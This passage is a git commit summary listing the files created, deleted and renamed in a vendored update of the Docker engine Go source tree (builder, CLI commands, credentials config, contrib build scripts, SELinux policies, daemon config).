vendor/github.com/docker/docker/builder/fscache/fscache.go create mode 100644 vendor/github.com/docker/docker/builder/fscache/fscache_test.go create mode 100644 vendor/github.com/docker/docker/builder/fscache/naivedriver.go delete mode 100644 vendor/github.com/docker/docker/builder/git.go delete mode 100644 vendor/github.com/docker/docker/builder/remote.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/archive.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/detect.go rename vendor/github.com/docker/docker/builder/{dockerignore_test.go => remotecontext/detect_test.go} (58%) create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/filehash.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/generate.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/git.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/git/gitutils.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/git/gitutils_test.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/lazycontext.go rename vendor/github.com/docker/docker/{pkg/httputils => builder/remotecontext}/mimetype.go (63%) create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/mimetype_test.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/remote.go rename vendor/github.com/docker/docker/builder/{ => remotecontext}/remote_test.go (62%) create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/tarsum.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/tarsum.pb.go create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/tarsum.proto create mode 100644 vendor/github.com/docker/docker/builder/remotecontext/tarsum_test.go rename vendor/github.com/docker/docker/builder/{ => remotecontext}/utils_test.go (66%) delete mode 100644 vendor/github.com/docker/docker/builder/tarsum.go delete mode 100644 vendor/github.com/docker/docker/builder/tarsum_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go delete mode 100644 vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/create.go delete mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/list.go delete mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/remove.go delete mode 100644 vendor/github.com/docker/docker/cli/command/cli.go delete mode 100644 vendor/github.com/docker/docker/cli/command/commands/commands.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/attach.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/commit.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/cp.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/create.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/diff.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/exec.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/exec_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/export.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/hijack.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/inspect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/kill.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/list.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/logs.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/pause.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/port.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/prune.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/ps_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/rename.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/restart.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/rm.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/run.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/start.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/stats.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/stats_helpers.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/stop.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/top.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/tty.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/unpause.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/update.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/utils.go delete mode 100644 vendor/github.com/docker/docker/cli/command/container/wait.go delete mode 100644 vendor/github.com/docker/docker/cli/command/events_utils.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/container.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/container_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/custom.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/custom_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/formatter.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/image.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/image_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/network.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/network_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/reflect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/service.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/stats.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/stats_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/volume.go delete mode 100644 vendor/github.com/docker/docker/cli/command/formatter/volume_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/build.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/history.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/import.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/inspect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/list.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/load.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/prune.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/pull.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/push.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/remove.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/save.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/tag.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/trust.go delete mode 100644 vendor/github.com/docker/docker/cli/command/image/trust_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/in.go delete mode 100644 vendor/github.com/docker/docker/cli/command/inspect/inspector.go delete mode 100644 vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/network/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/network/connect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/network/create.go delete mode 100644 vendor/github.com/docker/docker/cli/command/network/disconnect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/network/inspect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/network/list.go delete mode 100644 vendor/github.com/docker/docker/cli/command/network/prune.go delete mode 100644 vendor/github.com/docker/docker/cli/command/network/remove.go delete mode 100644 vendor/github.com/docker/docker/cli/command/node/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/node/demote.go delete mode 100644 vendor/github.com/docker/docker/cli/command/node/inspect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/node/list.go delete mode 100644 vendor/github.com/docker/docker/cli/command/node/opts.go delete mode 100644 vendor/github.com/docker/docker/cli/command/node/promote.go delete mode 100644 vendor/github.com/docker/docker/cli/command/node/ps.go delete mode 100644 vendor/github.com/docker/docker/cli/command/node/remove.go delete mode 100644 vendor/github.com/docker/docker/cli/command/node/update.go delete mode 100644 vendor/github.com/docker/docker/cli/command/out.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/create.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/disable.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/enable.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/inspect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/install.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/list.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/push.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/remove.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/set.go delete mode 100644 vendor/github.com/docker/docker/cli/command/plugin/upgrade.go delete mode 100644 vendor/github.com/docker/docker/cli/command/prune/prune.go delete mode 100644 vendor/github.com/docker/docker/cli/command/registry.go delete mode 100644 vendor/github.com/docker/docker/cli/command/registry/login.go delete mode 100644 vendor/github.com/docker/docker/cli/command/registry/logout.go delete mode 100644 vendor/github.com/docker/docker/cli/command/registry/search.go delete mode 100644 vendor/github.com/docker/docker/cli/command/secret/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/secret/create.go delete mode 100644 vendor/github.com/docker/docker/cli/command/secret/inspect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/secret/ls.go delete mode 100644 vendor/github.com/docker/docker/cli/command/secret/remove.go delete mode 100644 vendor/github.com/docker/docker/cli/command/secret/utils.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/create.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/inspect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/inspect_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/list.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/logs.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/opts.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/opts_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/parse.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/ps.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/remove.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/scale.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/trust.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/update.go delete mode 100644 vendor/github.com/docker/docker/cli/command/service/update_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/common.go delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/deploy.go delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/list.go delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/opts.go delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/ps.go delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/remove.go delete mode 100644 vendor/github.com/docker/docker/cli/command/stack/services.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/init.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/join.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/join_token.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/leave.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/opts.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/opts_test.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/unlock.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go delete mode 100644 vendor/github.com/docker/docker/cli/command/swarm/update.go delete mode 100644 vendor/github.com/docker/docker/cli/command/system/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/system/df.go delete mode 100644 vendor/github.com/docker/docker/cli/command/system/events.go delete mode 100644 vendor/github.com/docker/docker/cli/command/system/info.go delete mode 100644 vendor/github.com/docker/docker/cli/command/system/inspect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/system/prune.go delete mode 100644 vendor/github.com/docker/docker/cli/command/system/version.go delete mode 100644 vendor/github.com/docker/docker/cli/command/task/print.go delete mode 100644 vendor/github.com/docker/docker/cli/command/trust.go delete mode 100644 vendor/github.com/docker/docker/cli/command/utils.go delete mode 100644 vendor/github.com/docker/docker/cli/command/volume/cmd.go delete mode 100644 vendor/github.com/docker/docker/cli/command/volume/create.go delete mode 100644 vendor/github.com/docker/docker/cli/command/volume/inspect.go delete mode 100644 vendor/github.com/docker/docker/cli/command/volume/list.go delete mode 100644 vendor/github.com/docker/docker/cli/command/volume/prune.go delete mode 100644 vendor/github.com/docker/docker/cli/command/volume/remove.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/convert/compose.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/convert/compose_test.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/convert/service.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/convert/service_test.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/convert/volume.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/convert/volume_test.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/loader/example1.env delete mode 100644 vendor/github.com/docker/docker/cli/compose/loader/example2.env delete mode 100644 vendor/github.com/docker/docker/cli/compose/loader/full-example.yml delete mode 100644 vendor/github.com/docker/docker/cli/compose/loader/loader.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/loader/loader_test.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/schema/bindata.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json delete mode 100644 vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json delete mode 100644 vendor/github.com/docker/docker/cli/compose/schema/schema.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/schema/schema_test.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/template/template.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/template/template_test.go delete mode 100644 vendor/github.com/docker/docker/cli/compose/types/types.go create mode 100644 vendor/github.com/docker/docker/cli/config/configdir.go create mode 100644 vendor/github.com/docker/docker/cli/debug/debug.go rename vendor/github.com/docker/docker/{utils => cli/debug}/debug_test.go (71%) delete mode 100644 vendor/github.com/docker/docker/cli/flags/client.go delete mode 100644 vendor/github.com/docker/docker/cli/flags/common_test.go delete mode 100644 vendor/github.com/docker/docker/cli/trust/trust.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/config.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/config_test.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/configfile/file.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/configfile/file_test.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/credentials.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/file_store.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/native_store.go delete mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go create mode 100644 vendor/github.com/docker/docker/client/build_cancel.go create mode 100644 vendor/github.com/docker/docker/client/build_prune.go create mode 100644 vendor/github.com/docker/docker/client/config_create.go create mode 100644 vendor/github.com/docker/docker/client/config_create_test.go create mode 100644 vendor/github.com/docker/docker/client/config_inspect.go create mode 100644 vendor/github.com/docker/docker/client/config_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/config_list.go create mode 100644 vendor/github.com/docker/docker/client/config_list_test.go create mode 100644 vendor/github.com/docker/docker/client/config_remove.go create mode 100644 vendor/github.com/docker/docker/client/config_remove_test.go create mode 100644 vendor/github.com/docker/docker/client/config_update.go create mode 100644 vendor/github.com/docker/docker/client/config_update_test.go create mode 100644 vendor/github.com/docker/docker/client/container_prune_test.go create mode 100644 vendor/github.com/docker/docker/client/disk_usage_test.go create mode 100644 vendor/github.com/docker/docker/client/distribution_inspect.go create mode 100644 vendor/github.com/docker/docker/client/distribution_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/hijack_test.go create mode 100644 vendor/github.com/docker/docker/client/image_prune_test.go create mode 100644 vendor/github.com/docker/docker/client/network_prune_test.go create mode 100644 vendor/github.com/docker/docker/client/ping_test.go create mode 100644 vendor/github.com/docker/docker/client/session.go create mode 100644 vendor/github.com/docker/docker/client/swarm_get_unlock_key_test.go create mode 100644 vendor/github.com/docker/docker/client/swarm_unlock_test.go create mode 100644 vendor/github.com/docker/docker/client/task_logs.go delete mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_none.go delete mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go delete mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go delete mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_unix.go delete mode 100644 vendor/github.com/docker/docker/cmd/docker/docker.go delete mode 100644 vendor/github.com/docker/docker/cmd/docker/docker_test.go delete mode 100644 vendor/github.com/docker/docker/cmd/docker/docker_windows.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/config.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/config_common_unix.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/config_unix.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/config_unix_test.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/config_windows.go delete mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/docker_unix.go rename vendor/github.com/docker/docker/{cli/flags/common.go => cmd/dockerd/options.go} (56%) create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/options_test.go create mode 100644 vendor/github.com/docker/docker/codecov.yml delete mode 100644 vendor/github.com/docker/docker/container/container_linux.go delete mode 100644 vendor/github.com/docker/docker/container/container_notlinux.go create mode 100644 vendor/github.com/docker/docker/container/env.go rename vendor/github.com/docker/docker/{utils/utils_test.go => container/env_test.go} (56%) delete mode 100644 vendor/github.com/docker/docker/container/state_solaris.go delete mode 100644 vendor/github.com/docker/docker/container/state_unix.go delete mode 100644 vendor/github.com/docker/docker/container/state_windows.go create mode 100644 vendor/github.com/docker/docker/container/stream/attach.go create mode 100644 vendor/github.com/docker/docker/container/view.go create mode 100644 vendor/github.com/docker/docker/container/view_test.go delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh delete mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh delete mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md delete mode 100755 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile delete mode 100755 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile delete mode 100644 vendor/github.com/docker/docker/contrib/completion/REVIEWERS delete mode 100644 vendor/github.com/docker/docker/contrib/completion/bash/docker delete mode 100644 vendor/github.com/docker/docker/contrib/completion/fish/docker.fish delete mode 100644 vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt delete mode 100644 vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS delete mode 100644 vendor/github.com/docker/docker/contrib/completion/zsh/_docker create mode 100755 vendor/github.com/docker/docker/contrib/docker-machine-install-bundle.sh delete mode 100644 vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris delete mode 100755 vendor/github.com/docker/docker/contrib/mkimage-busybox.sh delete mode 100755 vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh delete mode 100755 vendor/github.com/docker/docker/contrib/mkimage-rinse.sh delete mode 100755 vendor/github.com/docker/docker/contrib/mkimage/solaris delete mode 100755 vendor/github.com/docker/docker/contrib/project-stats.sh delete mode 100755 vendor/github.com/docker/docker/contrib/reprepro/suites.sh delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if delete mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te delete mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE delete mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile delete mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc delete mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if delete mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te delete mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker_selinux.8.gz create mode 100644 vendor/github.com/docker/docker/daemon/archive_tarcopyoptions.go create mode 100644 vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_windows.go delete mode 100644 vendor/github.com/docker/docker/daemon/bindmount_solaris.go rename vendor/github.com/docker/docker/daemon/caps/{utils_unix.go => utils.go} (84%) create mode 100644 vendor/github.com/docker/docker/daemon/cluster/configs.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller_test.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/config.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/network_test.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/service_test.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/errors.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/container_test.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/filters_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/networks.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/noderunner.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/nodes.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/services.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/swarm.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/tasks.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/utils.go rename vendor/github.com/docker/docker/daemon/{ => config}/config.go (60%) create mode 100644 vendor/github.com/docker/docker/daemon/config/config_common_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/config/config_common_unix_test.go create mode 100644 vendor/github.com/docker/docker/daemon/config/config_test.go create mode 100644 vendor/github.com/docker/docker/daemon/config/config_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/config/config_unix_test.go create mode 100644 vendor/github.com/docker/docker/daemon/config/config_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/config/config_windows_test.go create mode 100644 vendor/github.com/docker/docker/daemon/config/opts.go delete mode 100644 vendor/github.com/docker/docker/daemon/config_common_unix.go delete mode 100644 vendor/github.com/docker/docker/daemon/config_experimental.go delete mode 100644 vendor/github.com/docker/docker/daemon/config_solaris.go delete mode 100644 vendor/github.com/docker/docker/daemon/config_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/config_unix.go delete mode 100644 vendor/github.com/docker/docker/daemon/config_unix_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/config_windows.go delete mode 100644 vendor/github.com/docker/docker/daemon/config_windows_test.go create mode 100644 vendor/github.com/docker/docker/daemon/configs.go create mode 100644 vendor/github.com/docker/docker/daemon/configs_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/configs_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/configs_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/container_linux.go delete mode 100644 vendor/github.com/docker/docker/daemon/container_operations_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/container_unix_test.go create mode 100644 vendor/github.com/docker/docker/daemon/container_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/create_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/daemon_experimental.go delete mode 100644 vendor/github.com/docker/docker/daemon/daemon_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_windows_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/debugtrap.go create mode 100644 vendor/github.com/docker/docker/daemon/dependency.go rename vendor/github.com/docker/docker/daemon/{ => discovery}/discovery.go (83%) create mode 100644 vendor/github.com/docker/docker/daemon/discovery/discovery_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/discovery_test.go create mode 100644 vendor/github.com/docker/docker/daemon/exec_linux_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/exec_solaris.go delete mode 100644 